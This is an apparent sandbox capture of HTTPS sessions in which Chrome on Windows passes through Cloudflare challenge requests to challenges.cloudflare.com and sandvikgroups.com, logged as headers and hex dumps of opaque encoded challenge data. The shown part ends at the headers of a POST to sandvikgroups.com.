                                        cf-chl-out-s: 41yiLWzLo69st/1Y/ajyHm/lYb3R/LcDHaH6U/XWjsmwhL2UARq3F6J/o4KrLfpOSxmp7dpFJks99mzLq/FwjRUwF+nalq96PLAzi86jo9/Eh5FvIhBqj0FyBI4cmbGx7aoHAj72rOex7eBDA5NZxqHn46w/tXy78iK+QDE4LmRoijk4Pzm3oakLyFEsdh8eVusiOLe48tD9r5dlAnWRjzkgiHbVedOC5A/bhGpk5uHzpQ977obsv3jMigSlxE4kojJ010H1kOPxLG/ae6hZpakh8B7vVFpHih8dKtq93Z8YcbhHB7EM1WUfDTjIr+rlWpHEUyjye61zWhXlOdSiJ9xJ/Zs2CE9+jYbBiYyh1dieXIMTUOPTY/7JPbJqjJau8fguV8vXMuL5sRu+aUA1kVOTa/Fxw8QoyefmQctRLK8gV80OD8zpiDGsYIbtfbdNS39LTKRgT2/Gn/UFbn7Z+21cAuTBECzExETISjzpRQcWJtFh942Rv4Gg+sVzjd1VRQNgnMQTQ6aZdPeAPRxmusToEZtl7AOYgL1muBHWuyw484hOLQY8WSOfA3rlBdddfgw1RCzjUNcxhtq/o5BDszifRL3Cn9X6BUDO2YYkljjBOEMf2aGxmfPFGW1Ri+Yq6NeyiRG++4jU9iqbPap4g+ceoQ9OGN8PAaGLJKewcqNGzAVJFKsHClQmS9wHu5w1wZEKoCwHIRhcHY3J09wVy6tvxgwga5fNQLBF49q/H3IToJ6N/m2p1tSDHE0fowhUUp0aaM6J9dUsPxBWlpMSz3oQpzkRSfrX6yqMxQYGba54v1+m7Efv3fgweST3sVjH4O1lW8iKgueHMFD3iwSG8PBKEnDrhpPt6ByNT7YLdj4G2Q9qjhmzm0zCezM1P0/4Ukae42hzCtCoDKtlH8wSFXpf0PB2EC+6DHw/ZxHrSrH5zwCd//fvdXvMJ4VbHrEg6VQqyqQKy5qRO0cwhqXMQio7gVeYqg9w3KBPi+bejrw=$/VBes [TRUNCATED]
                                        Server: cloudflare
                                        CF-RAY: 8fe6e91d7a914340-EWR
                                        2025-01-07 21:06:15 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                        Data Ascii: alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:15 UTC1345INData Raw: 69 6e 68 74 62 4a 5a 70 62 56 69 4b 57 58 31 65 67 70 56 67 65 5a 6d 53 59 32 4e 37 6e 4a 36 6c 66 34 71 73 67 62 4f 78 70 33 56 76 64 61 52 35 63 6d 32 4d 6d 59 6d 71 6a 4c 61 4f 6d 63 57 38 6b 70 33 4a 75 6f 54 4b 6c 37 75 41 68 62 32 6c 6a 4a 75 68 6b 4d 36 71 71 70 50 57 72 73 54 53 6c 64 6a 4b 79 37 6a 58 73 4d 4b 2f 6e 37 48 46 78 39 36 35 72 4b 33 58 76 63 75 39 76 4c 7a 44 77 64 44 32 31 2f 66 4b 78 4f 79 32 39 51 48 66 38 62 7a 77 33 2f 66 2b 38 4f 48 35 41 76 62 4d 39 78 44 66 38 41 50 50 33 75 6b 47 30 4e 58 33 44 4f 73 64 42 68 50 77 41 65 41 4d 46 50 4d 41 47 76 6a 2b 46 52 73 69 47 41 50 38 42 41 4c 75 44 76 48 71 4e 68 59 73 44 67 38 71 43 6a 34 51 47 7a 72 38 44 52 49 65 4d 50 77 5a 4e 78 73 45 50 42 6b 66 46 77 38 74 4f 77 6b 79 49 54 4a
                                        Data Ascii: inhtbJZpbViKWX1egpVgeZmSY2N7nJ6lf4qsgbOxp3VvdaR5cm2MmYmqjLaOmcW8kp3JuoTKl7uAhb2ljJuhkM6qqpPWrsTSldjKy7jXsMK/n7HFx965rK3Xvcu9vLzDwdD21/fKxOy29QHf8bzw3/f+8OH5AvbM9xDf8APP3ukG0NX3DOsdBhPwAeAMFPMAGvj+FRsiGAP8BALuDvHqNhYsDg8qCj4QGzr8DRIeMPwZNxsEPBkfFw8tOwkyITJ
                                        2025-01-07 21:06:15 UTC1369INData Raw: 6b 74 66 61 6b 32 4a 66 45 64 4a 5a 35 46 6a 6c 49 39 53 62 70 4e 62 65 32 2b 56 58 4a 6c 76 6d 5a 31 76 67 47 56 6b 6b 58 6c 69 6c 58 71 6f 62 4b 79 50 72 71 78 6c 63 6f 71 33 69 6f 36 78 74 6e 47 30 65 37 57 70 6b 71 39 2b 77 4b 4f 55 65 48 32 66 6b 34 50 49 6d 35 6e 44 79 71 50 50 6a 73 75 4f 72 63 7a 55 71 37 47 59 6b 61 2f 47 6e 73 6d 72 73 4e 6e 64 73 36 33 64 70 4b 4c 42 35 4a 32 65 33 2b 57 6c 7a 75 66 78 73 64 4c 68 74 61 6d 71 38 2f 47 35 75 73 62 32 36 4c 34 43 41 39 72 62 32 4d 44 78 34 76 59 4b 39 4e 2f 61 79 67 7a 4f 35 73 72 6c 2f 41 67 56 45 68 6b 5a 47 67 51 64 47 68 58 79 33 67 49 64 48 78 59 42 33 79 41 68 4b 43 4c 72 2b 2f 6b 73 4c 53 34 46 4b 7a 45 55 43 44 67 4e 42 2f 48 78 4a 67 73 71 39 2f 77 79 2f 67 49 73 2f 68 41 38 43 45 46 47
                                        Data Ascii: ktfak2JfEdJZ5FjlI9SbpNbe2+VXJlvmZ1vgGVkkXlilXqobKyPrqxlcoq3io6xtnG0e7Wpkq9+wKOUeH2fk4PIm5nDyqPPjsuOrczUq7GYka/GnsmrsNnds63dpKLB5J2e3+WlzufxsdLhtamq8/G5usb26L4CA9rb2MDx4vYK9N/aygzO5srl/AgVEhkZGgQdGhXy3gIdHxYB3yAhKCLr+/ksLS4FKzEUCDgNB/HxJgsq9/wy/gIs/hA8CEFG
                                        2025-01-07 21:06:15 UTC1369INData Raw: 64 70 54 57 78 6e 68 6e 52 52 56 48 70 70 6c 35 65 49 6b 33 57 55 69 6c 74 67 70 49 61 58 6e 35 65 4c 59 32 69 6d 6c 6d 69 42 72 4a 4f 42 68 34 65 32 72 6f 71 6c 63 49 79 30 72 59 65 2b 73 5a 39 30 74 70 75 33 65 4a 71 56 6d 35 57 54 6f 34 4f 4c 76 73 71 62 68 4a 75 6b 70 4b 43 66 75 4c 69 56 79 63 69 74 31 4e 79 62 7a 64 48 65 74 5a 76 68 32 62 44 6b 31 73 4f 6a 6e 38 72 4b 72 4d 4c 4e 72 4d 2b 78 38 4e 50 6d 7a 63 4c 53 74 2b 61 30 2f 65 44 67 79 2f 4b 2f 39 63 62 36 32 67 67 4d 35 41 49 4b 39 73 58 6e 43 51 7a 38 37 39 30 52 37 4e 4c 70 45 4e 6a 75 48 52 59 4a 36 74 38 62 32 66 63 61 35 4f 59 5a 47 4f 45 57 34 69 2f 75 48 66 73 75 38 43 77 78 4d 53 38 6a 46 41 30 36 4a 67 76 76 4e 2f 30 63 45 6b 4d 62 45 42 77 48 4d 42 51 57 42 45 59 31 54 41 38 6e 4c
                                        Data Ascii: dpTWxnhnRRVHppl5eIk3WUiltgpIaXn5eLY2imlmiBrJOBh4e2roqlcIy0rYe+sZ90tpu3eJqVm5WTo4OLvsqbhJukpKCfuLiVycit1NybzdHetZvh2bDk1sOjn8rKrMLNrM+x8NPmzcLSt+a0/eDgy/K/9cb62ggM5AIK9sXnCQz8790R7NLpENjuHRYJ6t8b2fca5OYZGOEW4i/uHfsu8CwxMS8jFA06JgvvN/0cEkMbEBwHMBQWBEY1TA8nL
                                        2025-01-07 21:06:15 UTC693INData Raw: 75 6a 70 6d 45 62 32 32 64 6c 34 79 50 6d 70 31 65 6f 70 2b 52 63 70 39 6b 6b 33 65 4e 62 61 5a 6d 6a 71 79 67 72 4b 56 79 73 6f 4b 7a 75 62 56 32 6a 6e 56 78 71 61 6d 37 72 63 47 75 76 59 61 69 76 73 4f 64 75 5a 61 41 78 36 4b 44 6a 74 44 4e 70 34 33 43 6f 36 72 5a 72 61 65 6d 6e 72 4c 5a 73 4a 6d 69 77 70 32 66 6e 63 66 6e 71 73 4c 6b 35 75 2f 70 71 71 2f 72 33 65 6e 4d 74 50 48 30 38 2f 4c 52 75 66 53 31 2b 73 37 2b 39 38 48 58 30 51 4d 43 38 63 62 49 42 4d 4c 45 79 50 6e 62 2f 42 4c 2b 42 51 6a 56 41 67 45 52 32 65 2f 75 46 52 38 61 41 43 45 66 34 76 4d 6e 48 66 6b 48 4b 65 45 6d 46 65 58 6e 37 41 38 79 4b 67 67 68 35 2b 67 78 39 68 59 37 4d 2b 37 7a 39 77 41 35 51 44 6f 57 50 68 52 49 47 69 51 65 54 41 73 62 44 45 6f 6c 47 30 56 52 50 44 31 4e 45 46
                                        Data Ascii: ujpmEb22dl4yPmp1eop+Rcp9kk3eNbaZmjqygrKVysoKzubV2jnVxqam7rcGuvYaivsOduZaAx6KDjtDNp43Co6rZraemnrLZsJmiwp2fncfnqsLk5u/pqq/r3enMtPH08/LRufS1+s7+98HX0QMC8cbIBMLEyPnb/BL+BQjVAgER2e/uFR8aACEf4vMnHfkHKeEmFeXn7A8yKggh5+gx9hY7M+7z9wA5QDoWPhRIGiQeTAsbDEolG0VRPD1NEF


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        28192.168.2.449786104.18.94.414435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:16 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/442655786:1736281748:kg17Jh4QwkIjazyMgCUACxDcKqgDYMNi1u3JYjXPALY/8fe6e8bcbdc57d11/Gt25uDESdAvJ6jww.JeJp3K3qkyx5r7rWJW3NwOWfhg-1736283959-1.1.1.1-zHBdodP33CmwVXOzXIJxOYl7ZcK_vAAcBoIVDvmo4Qzxc5eyAvqOG3Ale2tpAPnN HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:16 UTC379INHTTP/1.1 404 Not Found
                                        Date: Tue, 07 Jan 2025 21:06:16 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cf-chl-out: Vz+5K+CAGAOjHd8ygafNWQRbCvb6WPIr/7w=$XcVRKU0/lcfYdvNg
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8fe6e922b86d41e6-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:16 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        29192.168.2.449787188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:16 UTC1315OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/397843571:1736281603:ect8I6OU7F0koaDox1VrDHVsHkABB-y9YHkkrx60-68/8fe6e8a6e884443e/58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dld HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        Content-Length: 5487
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-arch: "x86"
                                        Content-type: application/x-www-form-urlencoded
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-model: ""
                                        CF-Challenge: 58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dld
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://sandvikgroups.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://sandvikgroups.com/?cono
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:16 UTC5487OUTData Raw: 76 5f 38 66 65 36 65 38 61 36 65 38 38 34 34 34 33 65 3d 4d 73 4f 34 25 32 62 56 6f 47 35 56 35 52 4f 52 4c 6f 46 74 4f 34 6b 73 67 47 52 4c 6f 39 68 54 34 6f 35 68 6d 68 62 6d 34 6b 44 52 72 68 4f 53 4a 66 34 74 4a 56 56 68 31 75 38 68 52 63 6c 73 52 46 33 36 2d 56 68 56 49 68 37 44 52 6b 66 67 67 34 6f 6c 68 4b 30 4a 68 61 75 6f 34 6f 53 4c 66 4c 77 35 6f 6b 68 62 76 35 68 54 4d 39 35 68 78 68 61 4f 68 57 50 77 24 56 69 68 42 6d 39 35 72 68 74 6d 4f 52 38 68 61 51 63 68 70 68 4f 35 68 6b 64 68 68 30 4c 79 4d 50 68 68 59 68 2d 2d 4a 68 70 55 6e 47 62 67 4a 68 47 44 6f 4d 47 2d 4c 68 75 63 6f 36 66 67 6a 73 66 42 59 53 51 38 38 51 68 70 32 2d 75 52 6f 2d 4f 75 4d 6d 66 68 6f 52 68 52 59 73 61 30 2d 4f 58 61 73 51 4c 51 77 61 5a 79 2d 74 68 52 36 61 47 63
                                        Data Ascii: v_8fe6e8a6e884443e=MsO4%2bVoG5V5RORLoFtO4ksgGRLo9hT4o5hmhbm4kDRrhOSJf4tJVVh1u8hRclsRF36-VhVIh7DRkfgg4olhK0Jhauo4oSLfLw5okhbv5hTM95hxhaOhWPw$VihBm95rhtmOR8haQchphO5hkdhh0LyMPhhYh--JhpUnGbgJhGDoMG-Lhuco6fgjsfBYSQ88Qhp2-uRo-OuMmfhoRhRYsa0-OXasQLQwaZy-thR6aGc
                                        2025-01-07 21:06:16 UTC1348INHTTP/1.1 200 OK
                                        Date: Tue, 07 Jan 2025 21:06:16 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4124
                                        Connection: close
                                        set-cookie: cf_chl_rc_i=;Expires=Mon, 06 Jan 2025 21:06:16 GMT;SameSite=Strict
                                        cf-chl-out: oagYcHuEqP9utcaIijNS/RC6ZrQU2frl93d8KHAp0dJPivD9JUbojkjG0Ys6OSnNOf1sBPMF/CLEKi26ooj7kbP0/K8piK/oq50iGmjo$RYnQEzsvGcReEYhm
                                        cf-chl-out-s: 4rGnj8tJywWxItnmioaVOrnfdEvjpPBghVfi7OuwvYz3FdcZCtfhOrunSHHn+tgH5FPChjJqDtxfiNITuF+7xXPENUPMsH0xO2eI85rtDZnTAAcx+gvM4f8JIMF1eFptpVwBVMco3TLHdMBZ8tgSBIZxGWNZekkm6BMoNi2VfjmAbEggQQWRLsHCfC0qp3lIZc9vLfWF06Ce5XAWQBrcq2EZcesT5rAkv1vC6l1Rr6RMm9qd+DhmOUp3usj77a+cLLqO/h4mKVoAQcXoMnC1Px8SnXHGRdT/owHjW9iTmC0lHDCHHgDjYNzRjrt/0lFWBV8XkEhI52pFZCuAsuccCav6GtLLgq4XLLnZlo0paNiMpHmUgydI1+jdAKfoIB6lR66gUOdmCH+1mvOPe063dnyXi2lbA8QFAlmE+xcR+eHf4BDQzWCAU5HfzRT0KavVxitTo+KQoWJfxkRRZ4tqm4NUIN+BdZLbg8uCEE2+27e7j4UOslaKe1bBN4SkF5Mfaa/819b5GzaXk7WY58+5bImDPbbpjJv+3eOnc4ZumQ==$jj48sR/SsimWfned
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rYy9JRZYnzi0FgmjTn56zth8QrtpW8ObVucKrEJLN5HqNYy9SfNQcXfbuXvBIftb94oquf2eZvpNT2bXomtijY74mZDcqccb4qViE3rfVpblZ7cP%2Bkw38x%2BCxx9Ei7rvJgchaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e92569bfc32e-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-07 21:06:16 UTC217INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 32 39 26 6d 69 6e 5f 72 74 74 3d 31 35 31 32 26 72 74 74 5f 76 61 72 3d 36 30 31 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 31 32 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 34 33 26 72 65 63 76 5f 62 79 74 65 73 3d 37 34 32 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 37 36 38 36 32 35 26 63 77 6e 64 3d 31 37 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 64 32 34 31 32 61 30 34 31 62 63 63 61 34 66 37 26 74 73 3d 31 37 31 26 78 3d 30 22 0d 0a 0d 0a
                                        Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1529&min_rtt=1512&rtt_var=601&sent=6&recv=12&lost=0&retrans=0&sent_bytes=2843&recv_bytes=7424&delivery_rate=1768625&cwnd=178&unsent_bytes=0&cid=d2412a041bcca4f7&ts=171&x=0"
                                        2025-01-07 21:06:16 UTC1173INData Raw: 68 4a 36 79 76 62 75 46 70 38 65 34 69 71 2f 4e 73 61 65 6d 74 4c 6e 53 6a 4c 58 54 72 72 57 6e 30 70 32 34 76 4e 79 33 74 4d 50 61 70 73 50 5a 78 4c 79 34 78 2b 6a 45 7a 50 44 73 79 4e 43 33 39 4f 48 71 74 76 76 6e 79 37 6a 73 75 50 76 34 7a 51 54 57 33 62 72 52 30 74 76 55 2b 76 6e 6a 43 51 30 52 30 4f 4c 66 41 51 54 6d 43 74 45 49 38 77 33 36 44 4f 30 52 33 66 37 33 45 52 38 4a 35 68 7a 6c 49 76 6b 74 47 53 6f 43 44 43 34 47 42 44 62 2b 4b 51 76 72 4b 2f 6f 48 43 42 2f 35 48 44 51 50 41 52 38 30 41 6a 30 6c 51 30 63 35 52 69 41 6c 4b 43 34 6d 45 51 73 6a 4d 56 46 59 4d 45 74 45 58 45 59 33 53 42 73 61 4e 78 31 52 49 54 77 38 5a 6a 55 68 57 6a 31 48 59 46 6b 74 53 55 42 75 62 58 42 65 55 47 4a 47 57 6c 6c 4b 65 33 45 37 4f 57 36 41 51 6c 31 74 63 48 56
                                        Data Ascii: hJ6yvbuFp8e4iq/NsaemtLnSjLXTrrWn0p24vNy3tMPapsPZxLy4x+jEzPDsyNC39OHqtvvny7jsuPv4zQTW3brR0tvU+vnjCQ0R0OLfAQTmCtEI8w36DO0R3f73ER8J5hzlIvktGSoCDC4GBDb+KQvrK/oHCB/5HDQPAR80Aj0lQ0c5RiAlKC4mEQsjMVFYMEtEXEY3SBsaNx1RITw8ZjUhWj1HYFktSUBubXBeUGJGWllKe3E7OW6AQl1tcHV
                                        2025-01-07 21:06:16 UTC1369INData Raw: 76 49 6f 46 54 34 35 4c 7a 4a 44 4d 2f 59 69 4c 77 55 47 42 78 4d 30 51 52 73 6e 4f 56 41 50 53 54 34 4d 52 7a 59 6a 49 53 49 6a 4a 53 55 2b 4d 52 59 31 4e 53 49 75 55 32 63 6b 47 6d 64 6a 4e 53 4a 46 4c 43 30 69 53 56 73 76 50 57 4e 42 4c 55 4a 6e 62 31 70 4c 64 6d 70 52 63 6e 77 36 64 49 53 46 65 58 78 68 50 34 64 4c 5a 57 64 35 58 59 70 74 6a 55 39 69 62 6f 57 46 56 6e 4e 6a 63 56 4f 51 64 49 39 75 6c 59 74 75 6e 47 4a 6a 6c 35 35 36 67 4b 47 6c 70 57 64 6f 72 6d 75 6a 69 34 65 4a 67 58 61 48 6c 61 32 4b 6b 59 6c 31 64 70 61 4d 6d 6e 75 58 6b 35 69 79 6e 4c 65 46 78 71 6a 47 68 37 6a 46 6a 59 54 45 79 39 47 4f 77 64 43 53 31 63 6a 58 75 72 6a 53 31 37 61 79 72 4e 6d 79 76 62 33 44 77 4b 6a 57 34 75 50 50 36 63 33 6d 30 2b 48 56 36 4c 2f 55 32 4d 6e 62
                                        Data Ascii: vIoFT45LzJDM/YiLwUGBxM0QRsnOVAPST4MRzYjISIjJSU+MRY1NSIuU2ckGmdjNSJFLC0iSVsvPWNBLUJnb1pLdmpRcnw6dISFeXxhP4dLZWd5XYptjU9iboWFVnNjcVOQdI9ulYtunGJjl556gKGlpWdormuji4eJgXaHla2KkYl1dpaMmnuXk5iynLeFxqjGh7jFjYTEy9GOwdCS1cjXurjS17ayrNmyvb3DwKjW4uPP6c3m0+HV6L/U2Mnb
                                        2025-01-07 21:06:16 UTC1369INData Raw: 34 6b 4f 44 77 6b 4a 44 74 41 52 78 5a 4a 54 54 64 42 4b 67 77 6f 48 43 77 72 55 69 38 75 4d 78 49 31 4c 7a 63 5a 55 54 77 37 4b 7a 39 41 50 30 4a 69 4f 45 49 70 58 7a 77 36 54 6c 78 44 59 55 39 50 54 33 56 4b 63 30 6c 46 4f 58 64 4d 66 56 5a 78 58 58 46 4b 64 6d 42 31 51 6d 42 6b 69 56 39 6d 58 32 64 65 66 32 79 44 55 6d 78 6a 54 57 74 77 61 47 4e 69 6c 6d 31 33 65 70 46 78 6b 57 71 66 67 5a 56 32 6c 6e 6c 79 61 6f 61 49 68 32 70 6c 72 72 47 46 6f 59 31 77 67 49 53 52 69 4b 57 48 6b 4a 4e 38 70 37 79 38 6e 58 31 38 6d 70 31 39 77 71 47 49 79 35 66 47 6d 4e 43 4a 76 62 75 50 6a 4b 32 52 71 71 44 58 6c 4e 66 57 32 74 4f 5a 71 4b 6d 2b 75 5a 2f 67 77 63 47 66 77 61 47 38 74 38 54 6a 32 61 33 71 7a 63 75 72 34 4f 2f 6e 2b 66 4c 4d 73 76 62 51 31 50 7a 38 36
                                        Data Ascii: 4kODwkJDtARxZJTTdBKgwoHCwrUi8uMxI1LzcZUTw7Kz9AP0JiOEIpXzw6TlxDYU9PT3VKc0lFOXdMfVZxXXFKdmB1QmBkiV9mX2def2yDUmxjTWtwaGNilm13epFxkWqfgZV2lnlyaoaIh2plrrGFoY1wgISRiKWHkJN8p7y8nX18mp19wqGIy5fGmNCJvbuPjK2RqqDXlNfW2tOZqKm+uZ/gwcGfwaG8t8Tj2a3qzcur4O/n+fLMsvbQ1Pz86
                                        2025-01-07 21:06:16 UTC213INData Raw: 35 45 6a 67 69 49 78 59 37 53 67 4e 45 52 53 6b 55 45 31 5a 54 52 56 59 6f 47 53 6b 55 4d 54 6f 72 59 56 56 59 5a 69 45 39 4f 30 59 38 4b 6d 49 71 52 45 64 75 58 55 6b 39 5a 6c 4e 73 51 6a 5a 5a 4f 54 49 37 62 48 31 62 54 48 4e 74 50 48 68 76 57 56 4f 43 63 6f 70 47 69 6b 70 73 68 47 70 70 57 6f 52 4b 62 47 61 54 6b 57 5a 59 57 5a 71 52 6e 59 79 52 6c 59 4f 65 65 59 2b 42 5a 48 57 42 59 6d 64 37 62 4b 4f 76 6d 61 47 62 67 33 4f 74 72 6e 43 59 68 48 47 74 6a 37 4b 48 74 37 2b 57 73 49 76 41 77 4c 4e 35 67 5a 7a 43 74 63 66 49 72 63 2f 46 71 4e 47 78 7a 73 62 53 73 38 58 49 78 74 6d 5a 73 37 44 5a 6d 5a 75 74 75 65 4b 39 71 71 73 3d
                                        Data Ascii: 5EjgiIxY7SgNERSkUE1ZTRVYoGSkUMTorYVVYZiE9O0Y8KmIqREduXUk9ZlNsQjZZOTI7bH1bTHNtPHhvWVOCcopGikpshGppWoRKbGaTkWZYWZqRnYyRlYOeeY+BZHWBYmd7bKOvmaGbg3OtrnCYhHGtj7KHt7+WsIvAwLN5gZzCtcfIrc/FqNGxzsbSs8XIxtmZs7DZmZutueK9qqs=


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        30192.168.2.449788188.114.97.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:17 UTC590OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/397843571:1736281603:ect8I6OU7F0koaDox1VrDHVsHkABB-y9YHkkrx60-68/8fe6e8a6e884443e/58_S4_P7D1bxAd7lrVVuyth7KNXgXFASaYVEZk8veLM-1736283956-1.2.1.1-0wbzDXCv9bibZZn4V5b_DjzZwQbfCQlppZo.InrmlaniOPny2OjSbFRdAn9E2dld HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 21:06:17 UTC927INHTTP/1.1 404 Not Found
                                        Date: Tue, 07 Jan 2025 21:06:17 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        cf-chl-out: XwJSnbiPcdEr95HoJH5kuBIvF0LwgNLtYc8=$0vlyvQ5H+KQLE4ve
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TgyHyJ9fdZ3Aix73FNjgFlfdO3yqZHPN%2FQ21eahiIhF6qxVLctsxZjL9SCu%2BVaB77pcMuYBXxAildc1FAwsmbuL0ugprFU4EQc2rnIt%2FRK3WXBrLwsYp2QeSbsZvinGWMPEXQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8fe6e92a3f43c40c-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        server-timing: cfL4;desc="?proto=TCP&rtt=33984&min_rtt=1550&rtt_var=19863&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1168&delivery_rate=1883870&cwnd=221&unsent_bytes=0&cid=07dd3805c82bff11&ts=152&x=0"
                                        2025-01-07 21:06:17 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        31192.168.2.449792188.114.96.34435480C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 21:06:17 UTC1238OUTPOST /?cono HTTP/1.1
                                        Host: sandvikgroups.com
                                        Connection: keep-alive
                                        Content-Length: 5421
                                        Cache-Control: max-age=0
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-full-version: "117.0.5938.132"
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                        Upgrade-Insecure-Requests: 1
                                        Origin: https://sandvikgroups.com
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-User: ?1
                                        Sec-Fetch-Dest: document
                                        Referer: https://sandvikgroups.com/?cono&__cf_chl_tk=nUWoOexFbtyZYvkeY72JgAtahWk3ffcRNyuxztq1Kx0-1736283956-1.0.1.1-LkclPWyYRrvRBxCvgln12SiuSNVtEEGwaasMK0OiMpE
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
